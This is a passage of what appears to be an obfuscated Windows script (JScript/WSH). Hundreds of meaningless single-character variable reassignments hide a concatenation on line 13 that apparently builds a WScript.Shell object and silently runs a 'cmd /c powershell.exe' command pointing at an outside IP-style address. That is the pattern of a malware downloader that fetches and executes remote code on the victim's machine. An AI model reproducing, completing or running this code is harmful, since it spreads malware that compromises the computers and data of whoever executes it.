13 | this[chpydvsbt + fjnoleg + wvrmwqslt + zwdjdnitk + auyyrkaud + ekjudvxr + gbocxqaqk][efdkdsv + zwdjdnitk + wptasoqh + tremc + gbocxqaqk + wptasoqh + pmxmp + edwjsj + exyckpsar + wptasoqh + wvrmwqslt + gbocxqaqk] ( chpydvsbt + fjnoleg + wvrmwqslt + zwdjdnitk + auyyrkaud + ekjudvxr + gbocxqaqk + fhguud + fjnoleg + lahogvwpe + wptasoqh + beqmlba + beqmlba ) [zwdjdnitk + eseqlex + vlove] ( wvrmwqslt + aipwxypv + ihumu + hnwafsgxt + mnkyz + wvrmwqslt + hnwafsgxt + ekjudvxr + jgcwkxwti + gjwbrmps + wptasoqh + zwdjdnitk + igsnn + lahogvwpe + wptasoqh + beqmlba + beqmlba + fhguud + wptasoqh + mmcgez + wptasoqh + hnwafsgxt + rwuta + efdkdsv + jgcwkxwti + aipwxypv + aipwxypv + tremc + vlove + ihumu + hnwafsgxt + sypeb + gijmu + vlove + dtuon + jgcwkxwti + ptvyoljaz + wptasoqh + rwuta + chpydvsbt + wptasoqh + edwjsj + nyyboqeiq + wptasoqh + lzpxsk + eseqlex + wptasoqh + igsnn + gbocxqaqk + hnwafsgxt + rwuta + pmxmp + eseqlex + gbocxqaqk + kktohemn + auyyrkaud + beqmlba + wptasoqh + hnwafsgxt + qaovxon + gbocxqaqk + wptasoqh + aipwxypv + ekjudvxr + qaovxon + qapfjle + auyyrkaud + vlove + dtuon + jgcwkxwti + auyyrkaud + wvrmwqslt + wptasoqh + fhguud + ekjudvxr + ihumu + fvmepuk + hnwafsgxt + lahogvwpe + gbocxqaqk + gbocxqaqk + ekjudvxr + lcgqkdbpk + mnkyz + mnkyz + kwbmkimkl + zymmkk + pxkhs + fhguud + kwbmkimkl + vharfbli + pxkhs + fhguud + kwbmkimkl + fhguud + lmwlel + kcoaid + zkzwlleoe + mnkyz + auyyrkaud + vlove + dtuon + jgcwkxwti + auyyrkaud + wvrmwqslt + wptasoqh + fhguud + ekjudvxr + lahogvwpe + ekjudvxr + sypeb + rocjbcp + rocjbcp + igsnn + gbocxqaqk + tremc + zwdjdnitk + gbocxqaqk + hnwafsgxt + qaovxon + gbocxqaqk + wptasoqh + aipwxypv + ekjudvxr + qaovxon + qapfjle + auyyrkaud + vlove + dtuon + jgcwkxwti + auyyrkaud + wvrmwqslt + wptasoqh + fhguud + ekjudvxr + ihumu + fvmepuk + rocjbcp + rocjbcp + wvrmwqslt + aipwxypv + ihumu + hnwafsgxt + mnkyz + wvrmwqslt + hnwafsgxt + vlove + wptasoqh + gbocxqaqk + hnwafsgxt + eseqlex + igsnn + wptasoqh + hnwafsgxt + qapfjle + qapfjle + kwbmkimkl + zymmkk + pxkhs + fhguud + kwbmkimkl + vharfbli + pxkhs + fhguud + kwbmkimkl + fhguud + lmwlel + kcoaid + zkzwlleoe + ddqkk + bbojd + bbojd + bbojd + bbojd + qapfjle + ihumu + tremc + dtuon + gjwbrmps + gjwbrmps + gjwbrmps + zwdjdnitk + jgcwkxwti + jgcwkxwti + gbocxqaqk + qapfjle + rocjbcp + rocjbcp + wvrmwqslt + aipwxypv + ihumu + hnwafsgxt + mnkyz + wvrmwqslt + hnwafsgxt + zwdjdnitk + wptasoqh + uvolij + igsnn + dtuon + zwdjdnitk + pxkhs + lmwlel + hnwafsgxt + mnkyz + igsnn + hnwafsgxt + qapfjle + qapfjle + kwbmkimkl + zymmkk + pxkhs + fhguud + kwbmkimkl + vharfbli + pxkhs + fhguud + kwbmkimkl + fhguud + lmwlel + kcoaid + zkzwlleoe + ddqkk + bbojd + bbojd + bbojd + bbojd + qapfjle + ihumu + tremc + dtuon + gjwbrmps + gjwbrmps + gjwbrmps + zwdjdnitk + jgcwkxwti + jgcwkxwti + gbocxqaqk + qapfjle + lmwlel + dmjneujnb + zkzwlleoe + pxkhs + pxkhs + kwbmkimkl + kcoaid + bbojd + zymmkk + lmwlel + kcoaid + lmwlel + bbojd + dmjneujnb + fhguud + ihumu + beqmlba + beqmlba, 0, false ); |
|
14 | } | |
15 | hnwafsgxt = "u"; | |
16 | hnwafsgxt = "G"; | |
17 | hnwafsgxt = "Q"; | |
18 | hnwafsgxt = "i"; | |
19 | hnwafsgxt = "y"; | |
20 | hnwafsgxt = " "; | |
21 | chpydvsbt = "q"; | |
22 | chpydvsbt = "Z"; | |
23 | chpydvsbt = "t"; | |
24 | chpydvsbt = "K"; | |
25 | chpydvsbt = "n"; | |
26 | chpydvsbt = "e"; | |
27 | chpydvsbt = "W"; | |
28 | rocjbcp = "O"; | |
29 | rocjbcp = "j"; | |
30 | rocjbcp = "Y"; | |
31 | rocjbcp = "U"; | |
32 | rocjbcp = "Z"; | |
33 | rocjbcp = "T"; | |
34 | rocjbcp = "Y"; | |
35 | rocjbcp = "I"; | |
36 | rocjbcp = "P"; | |
37 | rocjbcp = "L"; | |
38 | rocjbcp = "C"; | |
39 | rocjbcp = "&"; | |
40 | mmcgez = "x"; | |
41 | mmcgez = "p"; | |
42 | mmcgez = "K"; | |
43 | mmcgez = "b"; | |
44 | mmcgez = "f"; | |
45 | mmcgez = "E"; | |
46 | mmcgez = "B"; | |
47 | mmcgez = "x"; | |
48 | mfmcer = "M"; | |
49 | mfmcer = "G"; | |
50 | mfmcer = "o"; | |
51 | mfmcer = "n"; | |
52 | mfmcer = "R"; | |
53 | mfmcer = "t"; | |
54 | mfmcer = "B"; | |
55 | mfmcer = "s"; | |
56 | mfmcer = "a"; | |
57 | mfmcer = "O"; | |
58 | mfmcer = "E"; | |
59 | mfmcer = "w"; | |
60 | mfmcer = "K"; | |
61 | mfmcer = "T"; | |
62 | mfmcer = "K"; | |
63 | mnkyz = "m"; | |
64 | mnkyz = "X"; | |
65 | mnkyz = "k"; | |
66 | mnkyz = "m"; | |
67 | mnkyz = "K"; | |
68 | mnkyz = "a"; | |
69 | mnkyz = "F"; | |
70 | mnkyz = "g"; | |
71 | mnkyz = "m"; | |
72 | mnkyz = "n"; | |
73 | mnkyz = "u"; | |
74 | mnkyz = "M"; | |
75 | mnkyz = "v"; | |
76 | mnkyz = "d"; | |
77 | mnkyz = "C"; | |
78 | mnkyz = "B"; | |
79 | mnkyz = "g"; | |
80 | mnkyz = "B"; | |
81 | mnkyz = "L"; | |
82 | mnkyz = "T"; | |
83 | mnkyz = "Q"; | |
84 | mnkyz = "Z"; | |
85 | mnkyz = "Q"; | |
86 | mnkyz = "V"; | |
87 | mnkyz = "P"; | |
88 | mnkyz = "y"; | |
89 | mnkyz = "r"; | |
90 | mnkyz = "y"; | |
91 | mnkyz = "R"; | |
92 | mnkyz = "f"; | |
93 | mnkyz = "Z"; | |
94 | mnkyz = "O"; | |
95 | mnkyz = "R"; | |
96 | mnkyz = "X"; | |
97 | mnkyz = "o"; | |
98 | mnkyz = "g"; | |
99 | mnkyz = "/"; | |
100 | lzpxsk = "e"; | |
101 | lzpxsk = "O"; | |
102 | lzpxsk = "h"; | |
103 | lzpxsk = "m"; | |
104 | lzpxsk = "o"; | |
105 | lzpxsk = "a"; | |
106 | lzpxsk = "f"; | |
107 | lzpxsk = "o"; | |
108 | lzpxsk = "E"; | |
109 | lzpxsk = "R"; | |
110 | lzpxsk = "Z"; | |
111 | lzpxsk = "E"; | |
112 | lzpxsk = "V"; | |
113 | lzpxsk = "S"; | |
114 | lzpxsk = "s"; | |
115 | lzpxsk = "X"; | |
116 | lzpxsk = "C"; | |
117 | lzpxsk = "c"; | |
118 | lzpxsk = "S"; | |
119 | lzpxsk = "o"; | |
120 | lzpxsk = "p"; | |
121 | lzpxsk = "L"; | |
122 | lzpxsk = "W"; | |
123 | lzpxsk = "x"; | |
124 | lzpxsk = "Y"; | |
125 | lzpxsk = "T"; | |
126 | lzpxsk = "J"; | |
127 | lzpxsk = "m"; | |
128 | lzpxsk = "I"; | |
129 | lzpxsk = "P"; | |
130 | lzpxsk = "K"; | |
131 | lzpxsk = "S"; | |
132 | lzpxsk = "O"; | |
133 | lzpxsk = "N"; | |
134 | lzpxsk = "V"; | |
135 | lzpxsk = "P"; | |
136 | lzpxsk = "O"; | |
137 | lzpxsk = "x"; | |
138 | lzpxsk = "l"; | |
139 | lzpxsk = "d"; | |
140 | lzpxsk = "y"; | |
141 | lzpxsk = "q"; | |
142 | lahogvwpe = "a"; | |
143 | lahogvwpe = "r"; | |
144 | lahogvwpe = "P"; | |
145 | lahogvwpe = "n"; | |
146 | lahogvwpe = "G"; | |
147 | lahogvwpe = "V"; | |
148 | lahogvwpe = "A"; | |
149 | lahogvwpe = "r"; | |
150 | lahogvwpe = "g"; | |
151 | lahogvwpe = "I"; | |
152 | lahogvwpe = "i"; | |
153 | lahogvwpe = "y"; | |
154 | lahogvwpe = "c"; | |
155 | lahogvwpe = "I"; | |
156 | lahogvwpe = "m"; | |
157 | lahogvwpe = "j"; | |
158 | lahogvwpe = "L"; | |
159 | lahogvwpe = "W"; | |
160 | lahogvwpe = "I"; | |
161 | lahogvwpe = "R"; | |
162 | lahogvwpe = "a"; | |
163 | lahogvwpe = "o"; | |
164 | lahogvwpe = "U"; | |
165 | lahogvwpe = "q"; | |
166 | lahogvwpe = "j"; | |
167 | lahogvwpe = "j"; | |
168 | lahogvwpe = "O"; | |
169 | lahogvwpe = "v"; | |
170 | lahogvwpe = "Y"; | |
171 | lahogvwpe = "X"; | |
172 | lahogvwpe = "r"; | |
173 | lahogvwpe = "h"; | |
174 | ddqkk = "m"; | |
175 | ddqkk = "k"; | |
176 | ddqkk = "W"; | |
177 | ddqkk = "b"; | |
178 | ddqkk = "Z"; | |
179 | ddqkk = "n"; | |
180 | ddqkk = "r"; | |
181 | ddqkk = "X"; | |
182 | ddqkk = "z"; | |
183 | ddqkk = "z"; | |
184 | ddqkk = "T"; | |
185 | ddqkk = "O"; | |
186 | ddqkk = "N"; | |
187 | ddqkk = "R"; | |
188 | ddqkk = "c"; | |
189 | ddqkk = "N"; | |
190 | ddqkk = "X"; | |
191 | ddqkk = "p"; | |
192 | ddqkk = "z"; | |
193 | ddqkk = "K"; | |
194 | ddqkk = "O"; | |
195 | ddqkk = "A"; | |
196 | ddqkk = "u"; | |
197 | ddqkk = "N"; | |
198 | ddqkk = "A"; | |
199 | ddqkk = "I"; | |
200 | ddqkk = "I"; | |
201 | ddqkk = "I"; | |
202 | ddqkk = "M"; | |
203 | ddqkk = "H"; | |
204 | ddqkk = "V"; | |
205 | ddqkk = "f"; | |
206 | ddqkk = "T"; | |
207 | ddqkk = "r"; | |
208 | ddqkk = "k"; | |
209 | ddqkk = "L"; | |
210 | ddqkk = "x"; | |
211 | ddqkk = "K"; | |
212 | ddqkk = "F"; | |
213 | ddqkk = "@"; | |
214 | jgcwkxwti = "f"; | |
215 | jgcwkxwti = "X"; | |
216 | jgcwkxwti = "u"; | |
217 | jgcwkxwti = "a"; | |
218 | jgcwkxwti = "L"; | |
219 | jgcwkxwti = "h"; | |
220 | jgcwkxwti = "s"; | |
221 | jgcwkxwti = "u"; | |
222 | jgcwkxwti = "N"; | |
223 | jgcwkxwti = "Y"; | |
224 | jgcwkxwti = "B"; | |
225 | jgcwkxwti = "k"; | |
226 | jgcwkxwti = "u"; | |
227 | jgcwkxwti = "r"; | |
228 | jgcwkxwti = "g"; | |
229 | jgcwkxwti = "h"; | |
230 | jgcwkxwti = "o"; | |
231 | ffzxz = "o"; | |
232 | ffzxz = "x"; | |
233 | ffzxz = "X"; | |
234 | ffzxz = "Y"; | |
235 | ffzxz = "Y"; | |
236 | ffzxz = "p"; | |
237 | ffzxz = "B"; | |
238 | ffzxz = "P"; | |
239 | ffzxz = "K"; | |
240 | ffzxz = "t"; | |
241 | ffzxz = "k"; | |
242 | ffzxz = "n"; | |
243 | ffzxz = "g"; | |
244 | ffzxz = "I"; | |
245 | ffzxz = "Z"; | |
246 | ffzxz = "O"; | |
247 | ffzxz = "f"; | |
248 | ffzxz = "c"; | |
249 | ffzxz = "d"; | |
250 | ffzxz = "q"; | |
251 | ffzxz = "k"; | |
252 | ffzxz = "n"; | |
253 | ffzxz = "H"; | |
254 | ffzxz = "s"; | |
255 | ffzxz = "m"; | |
256 | ffzxz = "H"; | |
257 | jrxfqife = "q"; | |
258 | jrxfqife = "r"; | |
259 | jrxfqife = "u"; | |
260 | jrxfqife = "y"; | |
261 | jrxfqife = "j"; | |
262 | jrxfqife = "U"; | |
263 | jrxfqife = "Z"; | |
264 | jrxfqife = "f"; | |
265 | jrxfqife = "t"; | |
266 | jrxfqife = "a"; | |
267 | jrxfqife = "E"; | |
268 | jrxfqife = "c"; | |
269 | jrxfqife = "X"; | |
270 | jrxfqife = "x"; | |
271 | jrxfqife = "K"; | |
272 | jrxfqife = "G"; | |
273 | jrxfqife = "l"; | |
274 | jrxfqife = "N"; | |
275 | jrxfqife = "C"; | |
276 | jrxfqife = "F"; | |
277 | jrxfqife = "S"; | |
278 | jrxfqife = "x"; | |
279 | jrxfqife = "J"; | |
280 | jrxfqife = "y"; | |
281 | jrxfqife = "d"; | |
282 | jrxfqife = "R"; | |
283 | jrxfqife = "r"; | |
284 | jrxfqife = "Y"; | |
285 | jrxfqife = "U"; | |
286 | aipwxypv = "x"; | |
287 | aipwxypv = "T"; | |
288 | aipwxypv = "O"; | |
289 | aipwxypv = "u"; | |
290 | aipwxypv = "B"; | |
291 | aipwxypv = "J"; | |
292 | aipwxypv = "y"; | |
293 | aipwxypv = "d"; | |
294 | aipwxypv = "a"; | |
295 | aipwxypv = "m"; | |
296 | rwuta = "u"; | |
297 | rwuta = "x"; | |
298 | rwuta = "l"; | |
299 | rwuta = "E"; | |
300 | rwuta = "b"; | |
301 | rwuta = "W"; | |
302 | rwuta = "A"; | |
303 | rwuta = "E"; | |
304 | rwuta = "D"; | |
305 | rwuta = "U"; | |
306 | rwuta = "m"; | |
307 | rwuta = "X"; | |
308 | rwuta = "d"; | |
309 | rwuta = "s"; | |
310 | rwuta = "X"; | |
311 | rwuta = "d"; | |
312 | rwuta = "t"; | |
313 | rwuta = "C"; | |
314 | rwuta = "Z"; | |
315 | rwuta = "V"; | |
316 | rwuta = "T"; | |
317 | rwuta = "-"; | |
318 | wptasoqh = "w"; | |
319 | wptasoqh = "C"; | |
320 | wptasoqh = "w"; | |
321 | wptasoqh = "n"; | |
322 | wptasoqh = "s"; | |
323 | wptasoqh = "y"; | |
324 | wptasoqh = "h"; | |
325 | wptasoqh = "I"; | |
326 | wptasoqh = "p"; | |
327 | wptasoqh = "o"; | |
328 | wptasoqh = "d"; | |
329 | wptasoqh = "t"; | |
330 | wptasoqh = "Q"; | |
331 | wptasoqh = "S"; | |
332 | wptasoqh = "R"; | |
333 | wptasoqh = "i"; | |
334 | wptasoqh = "t"; | |
335 | wptasoqh = "K"; | |
336 | wptasoqh = "g"; | |
337 | wptasoqh = "A"; | |
338 | wptasoqh = "B"; | |
339 | wptasoqh = "j"; | |
340 | wptasoqh = "X"; | |
341 | wptasoqh = "Y"; | |
342 | wptasoqh = "u"; | |
343 | wptasoqh = "Z"; | |
344 | wptasoqh = "H"; | |
345 | wptasoqh = "E"; | |
346 | wptasoqh = "g"; | |
347 | wptasoqh = "L"; | |
348 | wptasoqh = "i"; | |
349 | wptasoqh = "g"; | |
350 | wptasoqh = "H"; | |
351 | wptasoqh = "e"; | |
352 | sypeb = "h"; | |
353 | sypeb = "Z"; | |
354 | sypeb = "q"; | |
355 | sypeb = "Z"; | |
356 | sypeb = "a"; | |
357 | sypeb = "v"; | |
358 | sypeb = "r"; | |
359 | sypeb = "k"; | |
360 | sypeb = "p"; | |
361 | sypeb = "k"; | |
362 | sypeb = "D"; | |
363 | sypeb = "w"; | |
364 | sypeb = "m"; | |
365 | sypeb = "Y"; | |
366 | sypeb = "s"; | |
367 | sypeb = "q"; | |
368 | sypeb = "K"; | |
369 | sypeb = "n"; | |
370 | sypeb = "\""; | |
371 | kktohemn = "Q"; | |
372 | kktohemn = "L"; | |
373 | kktohemn = "R"; | |
374 | kktohemn = "Z"; | |
375 | kktohemn = "w"; | |
376 | kktohemn = "o"; | |
377 | kktohemn = "b"; | |
378 | kktohemn = "f"; | |
379 | kktohemn = "B"; | |
380 | kktohemn = "p"; | |
381 | kktohemn = "T"; | |
382 | kktohemn = "H"; | |
383 | kktohemn = "p"; | |
384 | kktohemn = "B"; | |
385 | kktohemn = "b"; | |
386 | kktohemn = "Q"; | |
387 | kktohemn = "w"; | |
388 | kktohemn = "V"; | |
389 | kktohemn = "j"; | |
390 | kktohemn = "z"; | |
391 | kktohemn = "v"; | |
392 | kktohemn = "b"; | |
393 | kktohemn = "b"; | |
394 | kktohemn = "O"; | |
395 | kktohemn = "L"; | |
396 | kktohemn = "W"; | |
397 | kktohemn = "F"; | |
398 | kktohemn = "B"; | |
399 | kktohemn = "u"; | |
400 | kktohemn = "z"; | |
401 | kktohemn = "v"; | |
402 | kktohemn = "Q"; | |
403 | kktohemn = "n"; | |
404 | kktohemn = "p"; | |
405 | kktohemn = "t"; | |
406 | kktohemn = "A"; | |
407 | kktohemn = "H"; | |
408 | kktohemn = "F"; | |
409 | igsnn = "s"; | |
410 | beqmlba = "E"; | |
411 | beqmlba = "Z"; | |
412 | beqmlba = "S"; | |
413 | beqmlba = "r"; | |
414 | beqmlba = "O"; | |
415 | beqmlba = "e"; | |
416 | beqmlba = "L"; | |
417 | beqmlba = "l"; | |
418 | nyyboqeiq = "S"; | |
419 | nyyboqeiq = "S"; | |
420 | nyyboqeiq = "f"; | |
421 | nyyboqeiq = "i"; | |
422 | nyyboqeiq = "L"; | |
423 | nyyboqeiq = "S"; | |
424 | nyyboqeiq = "k"; | |
425 | nyyboqeiq = "V"; | |
426 | nyyboqeiq = "A"; | |
427 | nyyboqeiq = "f"; | |
428 | nyyboqeiq = "v"; | |
429 | nyyboqeiq = "v"; | |
430 | nyyboqeiq = "k"; | |
431 | nyyboqeiq = "E"; | |
432 | nyyboqeiq = "H"; | |
433 | nyyboqeiq = "O"; | |
434 | nyyboqeiq = "w"; | |
435 | nyyboqeiq = "e"; | |
436 | nyyboqeiq = "z"; | |
437 | nyyboqeiq = "f"; | |
438 | nyyboqeiq = "O"; | |
439 | nyyboqeiq = "x"; | |
440 | nyyboqeiq = "h"; | |
441 | nyyboqeiq = "a"; | |
442 | nyyboqeiq = "k"; | |
443 | nyyboqeiq = "H"; | |
444 | nyyboqeiq = "E"; | |
445 | nyyboqeiq = "R"; | |
446 | lmwlel = "e"; | |
447 | lmwlel = "D"; | |
448 | lmwlel = "o"; | |
449 | lmwlel = "g"; | |
450 | lmwlel = "x"; | |
451 | lmwlel = "L"; | |
452 | lmwlel = "V"; | |
453 | lmwlel = "V"; | |
454 | lmwlel = "2"; | |
455 | gbocxqaqk = "d"; | |
456 | gbocxqaqk = "d"; | |
457 | gbocxqaqk = "k"; | |
458 | gbocxqaqk = "t"; | |
459 | gbocxqaqk = "d"; | |
460 | gbocxqaqk = "J"; | |
461 | gbocxqaqk = "i"; | |
462 | gbocxqaqk = "l"; | |
463 | gbocxqaqk = "K"; | |
464 | gbocxqaqk = "U"; | |
465 | gbocxqaqk = "k"; | |
466 | gbocxqaqk = "e"; | |
467 | gbocxqaqk = "n"; | |
468 | gbocxqaqk = "n"; | |
469 | gbocxqaqk = "E"; | |
470 | gbocxqaqk = "t"; | |
471 | pxkhs = "g"; | |
472 | pxkhs = "f"; | |
473 | pxkhs = "A"; | |
474 | pxkhs = "J"; | |
475 | pxkhs = "F"; | |
476 | pxkhs = "a"; | |
477 | pxkhs = "J"; | |
478 | pxkhs = "K"; | |
479 | pxkhs = "w"; | |
480 | pxkhs = "s"; | |
481 | pxkhs = "h"; | |
482 | pxkhs = "v"; | |
483 | pxkhs = "o"; | |
484 | pxkhs = "R"; | |
485 | pxkhs = "F"; | |
486 | pxkhs = "y"; | |
487 | pxkhs = "t"; | |
488 | pxkhs = "h"; | |
489 | pxkhs = "c"; | |
490 | pxkhs = "j"; | |
491 | pxkhs = "N"; | |
492 | pxkhs = "e"; | |
493 | pxkhs = "t"; | |
494 | pxkhs = "D"; | |
495 | pxkhs = "x"; | |
496 | pxkhs = "A"; | |
497 | pxkhs = "e"; | |
498 | pxkhs = "3"; | |
499 | eseqlex = "q"; | |
500 | eseqlex = "D"; | |
501 | eseqlex = "a"; | |
502 | eseqlex = "h"; | |
503 | eseqlex = "r"; | |
504 | eseqlex = "u"; | |
505 | eseqlex = "h"; | |
506 | eseqlex = "M"; | |
507 | eseqlex = "X"; | |
508 | eseqlex = "Q"; | |
509 | eseqlex = "a"; | |
510 | eseqlex = "u"; | |
511 | eseqlex = "z"; | |
512 | eseqlex = "a"; | |
513 | eseqlex = "W"; | |
514 | eseqlex = "X"; | |
515 | eseqlex = "N"; | |
516 | eseqlex = "S"; | |
517 | eseqlex = "K"; | |
518 | eseqlex = "u"; | |
519 | vharfbli = "o"; | |
520 | vharfbli = "r"; | |
521 | vharfbli = "Z"; | |
522 | vharfbli = "v"; | |
523 | vharfbli = "v"; | |
524 | vharfbli = "B"; | |
525 | vharfbli = "s"; | |
526 | vharfbli = "X"; | |
527 | vharfbli = "j"; | |
528 | vharfbli = "Y"; | |
529 | vharfbli = "b"; | |
530 | vharfbli = "W"; | |
531 | vharfbli = "w"; | |
532 | vharfbli = "4"; | |
533 | edwjsj = "D"; | |
534 | edwjsj = "z"; | |
535 | edwjsj = "y"; | |
536 | edwjsj = "u"; | |
537 | edwjsj = "z"; | |
538 | edwjsj = "O"; | |
539 | edwjsj = "k"; | |
540 | edwjsj = "X"; | |
541 | edwjsj = "Z"; | |
542 | edwjsj = "R"; | |
543 | edwjsj = "P"; | |
544 | edwjsj = "d"; | |
545 | edwjsj = "J"; | |
546 | edwjsj = "i"; | |
547 | edwjsj = "N"; | |
548 | edwjsj = "e"; | |
549 | edwjsj = "E"; | |
550 | edwjsj = "F"; | |
551 | edwjsj = "A"; | |
552 | edwjsj = "l"; | |
553 | edwjsj = "k"; | |
554 | edwjsj = "W"; | |
555 | edwjsj = "g"; | |
556 | edwjsj = "f"; | |
557 | edwjsj = "W"; | |
558 | edwjsj = "X"; | |
559 | edwjsj = "j"; | |
560 | edwjsj = "T"; | |
561 | edwjsj = "y"; | |
562 | edwjsj = "r"; | |
563 | edwjsj = "q"; | |
564 | edwjsj = "N"; | |
565 | edwjsj = "M"; | |
566 | edwjsj = "b"; | |
567 | ogaboahd = "K"; | |
568 | ogaboahd = "c"; | |
569 | ogaboahd = "T"; | |
570 | auyyrkaud = "B"; | |
571 | auyyrkaud = "N"; | |
572 | auyyrkaud = "S"; | |
573 | auyyrkaud = "A"; | |
574 | auyyrkaud = "B"; | |
575 | auyyrkaud = "x"; | |
576 | auyyrkaud = "B"; | |
577 | auyyrkaud = "U"; | |
578 | auyyrkaud = "Z"; | |
579 | auyyrkaud = "N"; | |
580 | auyyrkaud = "f"; | |
581 | auyyrkaud = "I"; | |
582 | auyyrkaud = "G"; | |
583 | auyyrkaud = "K"; | |
584 | auyyrkaud = "F"; | |
585 | auyyrkaud = "f"; | |
586 | auyyrkaud = "i"; | |
587 | tgpemqw = "f"; | |
588 | tgpemqw = "H"; | |
589 | tgpemqw = "f"; | |
590 | tgpemqw = "X"; | |
591 | tgpemqw = "w"; | |
592 | tgpemqw = "p"; | |
593 | tgpemqw = "C"; | |
594 | tgpemqw = "g"; | |
595 | tgpemqw = "r"; | |
596 | tgpemqw = "X"; | |
597 | tgpemqw = "W"; | |
598 | tgpemqw = "h"; | |
599 | tgpemqw = "a"; | |
600 | tgpemqw = "h"; | |
601 | tgpemqw = "O"; | |
602 | tgpemqw = "p"; | |
603 | tgpemqw = "Y"; | |
604 | tgpemqw = "S"; | |
605 | tgpemqw = "d"; | |
606 | tgpemqw = "g"; | |
607 | tgpemqw = "L"; | |
608 | tgpemqw = "U"; | |
609 | tgpemqw = "q"; | |
610 | tgpemqw = "s"; | |
611 | tgpemqw = "Y"; | |
612 | qaovxon = "R"; | |
613 | qaovxon = "N"; | |
614 | qaovxon = "N"; | |
615 | qaovxon = "V"; | |
616 | qaovxon = "w"; | |
617 | qaovxon = "n"; | |
618 | qaovxon = "n"; | |
619 | qaovxon = "j"; | |
620 | qaovxon = "p"; | |
621 | qaovxon = "c"; | |
622 | qaovxon = "Y"; | |
623 | qaovxon = "Z"; | |
624 | qaovxon = "C"; | |
625 | qaovxon = "i"; | |
626 | qaovxon = "M"; | |
627 | qaovxon = "u"; | |
628 | qaovxon = "a"; | |
629 | qaovxon = "Z"; | |
630 | qaovxon = "d"; | |
631 | qaovxon = "%"; | |
632 | fhguud = "x"; | |
633 | fhguud = "z"; | |
634 | fhguud = "Y"; | |
635 | fhguud = "v"; | |
636 | fhguud = "E"; | |
637 | fhguud = "T"; | |
638 | fhguud = "N"; | |
639 | fhguud = "s"; | |
640 | fhguud = "L"; | |
641 | fhguud = "k"; | |
642 | fhguud = "a"; | |
643 | fhguud = "B"; | |
644 | fhguud = "t"; | |
645 | fhguud = "H"; | |
646 | fhguud = "C"; | |
647 | fhguud = "z"; | |
648 | fhguud = "V"; | |
649 | fhguud = "K"; | |
650 | fhguud = "k"; | |
651 | fhguud = "l"; | |
652 | fhguud = "T"; | |
653 | fhguud = "N"; | |
654 | fhguud = "M"; | |
655 | fhguud = "."; | |
656 | zymmkk = "D"; | |
657 | zymmkk = "t"; | |
658 | zymmkk = "s"; | |
659 | zymmkk = "H"; | |
660 | zymmkk = "n"; | |
661 | zymmkk = "Z"; | |
662 | zymmkk = "M"; | |
663 | zymmkk = "B"; | |
664 | zymmkk = "c"; | |
665 | zymmkk = "R"; | |
666 | zymmkk = "9"; | |
667 | fvmepuk = "L"; | |
668 | fvmepuk = "j"; | |
669 | fvmepuk = "Z"; | |
670 | fvmepuk = "P"; | |
671 | fvmepuk = "K"; | |
672 | fvmepuk = "g"; | |
673 | fvmepuk = "A"; | |
674 | fvmepuk = "C"; | |
675 | fvmepuk = "v"; | |
676 | fvmepuk = "W"; | |
677 | fvmepuk = "v"; | |
678 | fvmepuk = "v"; | |
679 | fvmepuk = "b"; | |
680 | fvmepuk = "p"; | |
681 | fvmepuk = "m"; | |
682 | fvmepuk = "f"; | |
683 | qdgioaui = "Z"; | |
684 | qdgioaui = "u"; | |
685 | qdgioaui = "j"; | |
686 | qdgioaui = "v"; | |
687 | qdgioaui = "V"; | |
688 | qdgioaui = "p"; | |
689 | qdgioaui = "S"; | |
690 | qdgioaui = "H"; | |
691 | qdgioaui = "F"; | |
692 | qdgioaui = "H"; | |
693 | qdgioaui = "i"; | |
694 | qdgioaui = "b"; | |
695 | qdgioaui = "c"; | |
696 | qdgioaui = "d"; | |
697 | qdgioaui = "v"; | |
698 | qdgioaui = "g"; | |
699 | qdgioaui = "c"; | |
700 | qdgioaui = "E"; | |
701 | qdgioaui = "z"; | |
702 | qdgioaui = "n"; | |
703 | qdgioaui = "T"; | |
704 | qdgioaui = "x"; | |
705 | qdgioaui = "w"; | |
706 | qdgioaui = "G"; | |
707 | qdgioaui = "S"; | |
708 | qdgioaui = "E"; | |
709 | fjnoleg = "O"; | |
710 | fjnoleg = "S"; | |
711 | dmjneujnb = "q"; | |
712 | dmjneujnb = "o"; | |
713 | dmjneujnb = "Z"; | |
714 | dmjneujnb = "u"; | |
715 | dmjneujnb = "O"; | |
716 | dmjneujnb = "i"; | |
717 | dmjneujnb = "g"; | |
718 | dmjneujnb = "q"; | |
719 | dmjneujnb = "K"; | |
720 | dmjneujnb = "J"; | |
721 | dmjneujnb = "q"; | |
722 | dmjneujnb = "R"; | |
723 | dmjneujnb = "M"; | |
724 | dmjneujnb = "6"; | |
725 | vlove = "e"; | |
726 | vlove = "X"; | |
727 | vlove = "F"; | |
728 | vlove = "C"; | |
729 | vlove = "f"; | |
730 | vlove = "Q"; | |
731 | vlove = "c"; | |
732 | vlove = "r"; | |
733 | vlove = "U"; | |
734 | vlove = "U"; | |
735 | vlove = "r"; | |
736 | vlove = "z"; | |
737 | vlove = "n"; | |
738 | kwbmkimkl = "m"; | |
739 | kwbmkimkl = "d"; | |
740 | kwbmkimkl = "y"; | |
741 | kwbmkimkl = "q"; | |
742 | kwbmkimkl = "r"; | |
743 | kwbmkimkl = "A"; | |
744 | kwbmkimkl = "u"; | |
745 | kwbmkimkl = "u"; | |
746 | kwbmkimkl = "l"; | |
747 | kwbmkimkl = "u"; | |
748 | kwbmkimkl = "E"; | |
749 | kwbmkimkl = "A"; | |
750 | kwbmkimkl = "a"; | |
751 | kwbmkimkl = "D"; | |
752 | kwbmkimkl = "o"; | |
753 | kwbmkimkl = "Q"; | |
754 | kwbmkimkl = "S"; | |
755 | kwbmkimkl = "R"; | |
756 | kwbmkimkl = "H"; | |
757 | kwbmkimkl = "h"; | |
758 | kwbmkimkl = "N"; | |
759 | kwbmkimkl = "o"; | |
760 | kwbmkimkl = "p"; | |
761 | kwbmkimkl = "J"; | |
762 | kwbmkimkl = "1"; | |
763 | szyia = "O"; | |
764 | szyia = "k"; | |
765 | szyia = "G"; | |
766 | szyia = "Y"; | |
767 | szyia = "K"; | |
768 | szyia = "N"; | |
769 | szyia = "y"; | |
770 | szyia = "l"; | |
771 | szyia = "j"; | |
772 | szyia = "P"; | |
773 | szyia = "Q"; | |
774 | szyia = "A"; | |
775 | szyia = "e"; | |
776 | szyia = "l"; | |
777 | szyia = "Q"; | |
778 | szyia = "p"; | |
779 | szyia = "x"; | |
780 | szyia = "Y"; | |
781 | szyia = "H"; | |
782 | szyia = "P"; | |
783 | uvolij = "V"; | |
784 | uvolij = "j"; | |
785 | uvolij = "O"; | |
786 | uvolij = "u"; | |
787 | uvolij = "u"; | |
788 | uvolij = "I"; | |
789 | uvolij = "O"; | |
790 | uvolij = "X"; | |
